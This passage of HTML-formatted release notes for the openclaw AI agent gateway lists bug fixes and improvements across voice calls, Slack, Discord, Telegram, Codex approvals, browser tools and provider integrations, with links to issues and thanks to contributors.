<li>Plugins/Voice Call: add <code>agentId</code> for voice response generation, so phone calls can use a dedicated agent workspace instead of always routing through <code>main</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051693147" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42155/hovercard" href="https://github.com/openclaw/openclaw/issues/42155">#42155</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TheOpie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TheOpie">@TheOpie</a>.</li>
<li>Plugins/Voice Call: scope embedded voice response sandbox resolution to the selected voice agent, so implicit <code>main</code> voice sessions respect <code>agents.defaults.sandbox.mode: "off"</code> even when other agents define sandboxed Docker binds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159435087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56367" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56367/hovercard" href="https://github.com/openclaw/openclaw/issues/56367">#56367</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crpol/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crpol">@crpol</a>.</li>
<li>Media tools: honor the configured web-fetch SSRF policy for media understanding, image/music/video generation references, and PDF inputs, so explicit RFC2544 opt-ins cover WebChat OSS uploads without weakening defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326351573" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71300" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71300/hovercard" href="https://github.com/openclaw/openclaw/issues/71300">#71300</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326509925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71321" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71321/hovercard" href="https://github.com/openclaw/openclaw/pull/71321">#71321</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Agents/TTS: suppress successful spoken transcripts from verbose chat tool output when structured voice media is already queued, while preserving text output for non-builtin tool-name collisions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325922151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71282" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71282/hovercard" href="https://github.com/openclaw/openclaw/issues/71282">#71282</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Plugins/Google Meet: reuse active Meet tabs across harmless URL query differences, recover already-open tabs after browser timeouts, surface manual-action details for login or permission blockers, and let <code>googlemeet recover-tab</code> inspect paired browser nodes from the terminal.</li>
<li>Cron/isolated sessions: clear stale runtime, lifecycle, auth, model, exec, heartbeat, usage, privilege, routing, and delivery artifacts when creating a fresh isolated run, and persist per-run session rows as snapshots so old base-session state no longer leaks into new cron executions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/sessions: recover main-agent turns interrupted by a gateway restart from stale transcript-lock evidence, avoiding stuck <code>status: "running"</code> sessions without broad post-boot transcript scans. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314936402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70555" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70555/hovercard" href="https://github.com/openclaw/openclaw/issues/70555">#70555</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bitloi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bitloi">@bitloi</a>.</li>
<li>Codex approvals: sanitize MCP elicitation approval titles, descriptions, and display parameters before forwarding them to OpenClaw approval prompts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326619303" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71343" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71343/hovercard" href="https://github.com/openclaw/openclaw/pull/71343">#71343</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Codex approvals: keep command approval responses within Codex app-server <code>availableDecisions</code>, including deny/cancel fallbacks for prompts that do not offer <code>decline</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326584840" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71338" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71338/hovercard" href="https://github.com/openclaw/openclaw/pull/71338">#71338</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Codex harness: reject same-thread app-server notifications without <code>turnId</code> or <code>turn.id</code> after a bound turn starts, preventing unscoped events from mutating or completing the active reply. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326452801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71317" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71317/hovercard" href="https://github.com/openclaw/openclaw/pull/71317">#71317</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Plugins/Google Meet: include live Chrome-node readiness and Parallels recovery checks in setup, so stale node tokens or disconnected VM browsers are visible before an agent opens a meeting.</li>
<li>Context engine: keep safeguard compaction checks active after context-engine windowing and for <code>ownsCompaction</code> engines, so large transcripts can compact before prompt submission instead of waiting for provider overflow. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326523565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71325" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71325/hovercard" href="https://github.com/openclaw/openclaw/issues/71325">#71325</a>.</li>
<li>Approvals: compact structured home-directory paths to <code>~</code> across Codex permission prompts and exec approval metadata without repeating them as a separate high-risk warning, while preserving filesystem root and wildcard host warnings.</li>
<li>Plugins/runtime deps: isolate the internal npm cache used for bundled plugin runtime-dependency repair and let package updates refresh/verify already-current installs, so failed update or sudo doctor runs can be repaired by rerunning <code>openclaw update</code>.</li>
<li>Agents/delete: keep <code>--json</code> output machine-readable and retain workspaces that overlap another agent's workspace instead of moving shared state to Trash. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320137241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70889" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70889/hovercard" href="https://github.com/openclaw/openclaw/issues/70889">#70889</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320137555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70890" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70890/hovercard" href="https://github.com/openclaw/openclaw/issues/70890">#70890</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320185325" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70897" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70897/hovercard" href="https://github.com/openclaw/openclaw/pull/70897">#70897</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaseonedge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaseonedge">@kaseonedge</a>.</li>
<li>Browser/screenshot: honor <code>timeoutMs</code> through host and node screenshot requests, bound raw CDP screenshot commands, and avoid beyond-viewport CDP capture for ordinary viewport screenshots, so Windows Chrome captures no longer hang past the requested deadline. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285909775" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68330/hovercard" href="https://github.com/openclaw/openclaw/issues/68330">#68330</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Woodylai24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Woodylai24">@Woodylai24</a>.</li>
<li>Telegram/model picker: show configured model display names when browsing models through provider buttons, matching typed <code>/models &lt;provider&gt;</code> output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315081810" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70560" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70560/hovercard" href="https://github.com/openclaw/openclaw/issues/70560">#70560</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321545507" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71016" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71016/hovercard" href="https://github.com/openclaw/openclaw/pull/71016">#71016</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iskim77/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iskim77">@iskim77</a>.</li>
<li>Plugins/runtime deps: stage bundled plugin runtime dependencies for packaged/global installs in an external runtime root and retain already staged deps across repairs, avoiding package-tree update races and npm pruning after upgrades.</li>
<li>Plugins/runtime deps: log bundled plugin runtime-dependency staging before synchronous npm installs start and include elapsed timing afterward, so first boot after upgrades no longer looks hung while dependencies are being repaired.</li>
<li>Memory/Bedrock: skip Bedrock during automatic memory embedding selection when AWS credentials are unavailable, so <code>memory_search</code> can fall back to lexical search instead of failing on the first embed call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323744616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71143" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71143/hovercard" href="https://github.com/openclaw/openclaw/issues/71143">#71143</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325370311" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71245" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71245/hovercard" href="https://github.com/openclaw/openclaw/pull/71245">#71245</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bitloi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bitloi">@bitloi</a>.</li>
<li>Agents/failover: forward embedded run abort signals into provider-owned model streams, cap implicit LLM idle watchdogs below long run timeouts, and mark 429 responses without usable retry timing as non-retryable so GitHub Copilot rate limits fail over or surface promptly instead of hanging until run timeout. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323345150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71120/hovercard" href="https://github.com/openclaw/openclaw/issues/71120">#71120</a>.</li>
<li>Plugins/Google Meet: make meeting creation join by default, with an explicit URL-only opt-out, so agents that create a Meet also enter it.</li>
<li>Telegram/polling: persist accepted update offsets before long-running handlers complete so poller restarts do not replay already-ingested updates, while keeping same-process retries for handler failures.</li>
<li>Telegram/config: include generated Telegram channel config schema metadata in packaged plugin manifests so forum-topic/group config is accepted before runtime loads.</li>
<li>CLI/Claude: include user-configured <code>mcp.servers</code> in the strict Claude CLI MCP bundle config, matching Pi runs while preserving the OpenClaw loopback override. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320264229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70909" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70909/hovercard" href="https://github.com/openclaw/openclaw/issues/70909">#70909</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keishingu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keishingu">@keishingu</a>.</li>
<li>Browser/tool: keep explicit AI snapshots from inheriting the efficient role-snapshot default and preserve numeric Playwright AI refs, so <code>--format ai</code> remains a real AI snapshot path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218504074" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62550/hovercard" href="https://github.com/openclaw/openclaw/issues/62550">#62550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ly85206559/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ly85206559">@ly85206559</a>.</li>
<li>Gateway/config: keep in-process config patch reload comparisons on the resolved source snapshot when <code>${VAR}</code> env refs are restored on disk, avoiding false full gateway restarts for unchanged gateway/plugin secrets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324867707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71208/hovercard" href="https://github.com/openclaw/openclaw/issues/71208">#71208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robbiethompson18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robbiethompson18">@robbiethompson18</a>.</li>
<li>Slack/messages: serialize write-client requests and whole outbound sends per target so rapid multi-message Slack replies preserve send order. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292107422" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69101" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69101/hovercard" href="https://github.com/openclaw/openclaw/issues/69101">#69101</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292189761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69105/hovercard" href="https://github.com/openclaw/openclaw/pull/69105">#69105</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nightq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nightq">@nightq</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ztexydt-cqh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ztexydt-cqh">@ztexydt-cqh</a>.</li>
<li>Slack/messages: keep Slack bot tokens out of internal message-ordering and DM cache keys.</li>
<li>Slack/exec approvals: resolve native approval button clicks over the Gateway instead of delivering <code>/approve ...</code> as plain agent text, preserving retry buttons if Gateway resolution fails. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321666005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71023" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71023/hovercard" href="https://github.com/openclaw/openclaw/issues/71023">#71023</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321669987" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71025" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71025/hovercard" href="https://github.com/openclaw/openclaw/pull/71025">#71025</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marusan03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marusan03">@marusan03</a>.</li>
<li>Browser/tool: expose browser doctor diagnostics to agents and extend <code>openclaw doctor</code> browser readiness notes for managed Chromium launch prerequisites. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222322920" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62948" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62948/hovercard" href="https://github.com/openclaw/openclaw/pull/62948">#62948</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222196161" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62936/hovercard" href="https://github.com/openclaw/openclaw/pull/62936">#62936</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seanc-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seanc-dev">@seanc-dev</a>.</li>
<li>Slack/files: return non-image <code>download-file</code> results as local file paths instead of image payloads, and include Slack file IDs in inbound file placeholders so agents can call <code>download-file</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324876679" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71212/hovercard" href="https://github.com/openclaw/openclaw/issues/71212">#71212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teamrazo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teamrazo">@teamrazo</a>.</li>
<li>Browser control: scope standalone loopback auth to the resolved active gateway credential and fail closed when password mode lacks a resolved password, so inactive tokens or passwords no longer authorize browser routes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250577846" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65626/hovercard" href="https://github.com/openclaw/openclaw/issues/65626">#65626</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250669198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65639" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65639/hovercard" href="https://github.com/openclaw/openclaw/pull/65639">#65639</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</li>
<li>Control UI/Codex harness: emit native Codex app-server assistant and lifecycle completion events so live webchat runs stop spinning without needing a transcript reload fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319274284" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70815" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70815/hovercard" href="https://github.com/openclaw/openclaw/pull/70815">#70815</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lesaai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lesaai">@lesaai</a>.</li>
<li>Agents/sessions: persist the runtime-resolved context budget from embedded agent runs, so Codex GPT-5.5 sessions keep the catalog/runtime context cap instead of falling back to the generic 200k status value. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326242598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71294" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71294/hovercard" href="https://github.com/openclaw/openclaw/issues/71294">#71294</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tud0r/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tud0r">@tud0r</a>.</li>
<li>Agents/tools: fail runs before model submission when explicit tool allowlists resolve to no callable tools, preventing text-only hallucinated tool results for missing tools such as plugin commands that were not registered. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326193435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71292" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71292/hovercard" href="https://github.com/openclaw/openclaw/issues/71292">#71292</a>.</li>
<li>Agents/embedded: skip provider submission when an embedded run has no prompt, replay history, or prompt-local images, preventing empty OpenAI Responses requests from surfacing provider errors into user channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323565088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71130" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71130/hovercard" href="https://github.com/openclaw/openclaw/issues/71130">#71130</a>.</li>
<li>Providers/Google: map <code>/think adaptive</code> to Gemini dynamic thinking instead of a fixed medium/high budget, using Gemini 3's provider default and Gemini 2.5's <code>thinkingBudget: -1</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326446608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71316" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71316/hovercard" href="https://github.com/openclaw/openclaw/issues/71316">#71316</a>.</li>
<li>Providers/MiniMax: keep M2.7 chat model metadata text-only so image tool requests route through <code>MiniMax-VL-01</code> instead of the Anthropic-compatible chat endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326293583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71296/hovercard" href="https://github.com/openclaw/openclaw/issues/71296">#71296</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ilker-cevikkaya/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ilker-cevikkaya">@ilker-cevikkaya</a>.</li>
<li>Discord/replies: run <code>message_sending</code> plugin hooks for Discord reply delivery, including DM targets, so plugins can transform or cancel outbound Discord replies consistently with other channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190982139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59350" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59350/hovercard" href="https://github.com/openclaw/openclaw/issues/59350">#59350</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322868959" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71094" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71094/hovercard" href="https://github.com/openclaw/openclaw/pull/71094">#71094</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wei840222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wei840222">@wei840222</a>.</li>
<li>Discord/replies: preserve single-use native reply semantics across shared payload fallback, component, voice, and queued delivery paths, so explicit reply tags no longer consume implicit reply slots and chunked fallback sends reply only once.</li>
<li>Control UI/commands: carry provider-owned thinking option ids/labels in session rows and defaults so fresh sessions show and accept dynamic modes such as <code>adaptive</code>, <code>xhigh</code>, and <code>max</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325756414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71269" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71269/hovercard" href="https://github.com/openclaw/openclaw/issues/71269">#71269</a>. Thanks @Young-Khalil.</li>
<li>Image generation: make explicit <code>model=</code> overrides exact-only so failed <code>openai/gpt-image-2</code> requests no longer fall through to Gemini or other configured providers, and update <code>image_generate list</code> to mention OpenAI Codex OAuth as valid auth for <code>openai/gpt-image-2</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326139985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71290/hovercard" href="https://github.com/openclaw/openclaw/issues/71290">#71290</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325190135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71231" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71231/hovercard" href="https://github.com/openclaw/openclaw/issues/71231">#71231</a>. Thanks @Young-Khalil.</li>
<li>Providers/GitHub Copilot: keep the plugin stream wrapper from claiming transport selection before OpenClaw picks a boundary-aware stream path, avoiding Pi's stale fallback Copilot headers on normal model turns.</li>
<li>Discord/subagents: pass runtime config into thread-bound native subagent binding and require it at the helper boundary so Discord channel resolution keeps account-aware config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322098742" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71054/hovercard" href="https://github.com/openclaw/openclaw/issues/71054">#71054</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320606710" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70945" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70945/hovercard" href="https://github.com/openclaw/openclaw/pull/70945">#70945</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jai">@jai</a>.</li>
<li>Slack/Assistant: accept Slack Assistant DM <code>message_changed</code> events when their metadata identifies the human sender, while continuing to drop self-authored bot edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148395314" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55445" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55445/hovercard" href="https://github.com/openclaw/openclaw/issues/55445">#55445</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AlfredPros/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AlfredPros">@AlfredPros</a>.</li>
<li>Slack/native streaming: suppress reasoning-only payloads before <code>chat.startStream</code>/<code>appendStream</code>, so Claude extended-thinking blocks no longer appear as visible Slack messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194611734" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59687/hovercard" href="https://github.com/openclaw/openclaw/issues/59687">#59687</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vision-ifc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vision-ifc">@vision-ifc</a>.</li>
<li>Slack/block replies: keep multi-part block deliveries in the first Slack reply thread when <code>replyToMode</code> is <code>first</code>, matching text reply threading instead of leaking later blocks into the channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4092109893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49341/hovercard" href="https://github.com/openclaw/openclaw/issues/49341">#49341</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pholmstr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pholmstr">@pholmstr</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiwuqi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiwuqi">@xiwuqi</a>.</li>
<li>Slack/thread broadcasts: process <code>thread_broadcast</code> events as user messages so replies sent with "Also send to channel" reach the agent instead of becoming metadata-only system events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161591158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56605" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56605/hovercard" href="https://github.com/openclaw/openclaw/issues/56605">#56605</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3873756720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/4351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/4351/hovercard" href="https://github.com/openclaw/openclaw/issues/4351">#4351</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clawSean/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clawSean">@clawSean</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlowin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlowin">@jlowin</a>.</li>
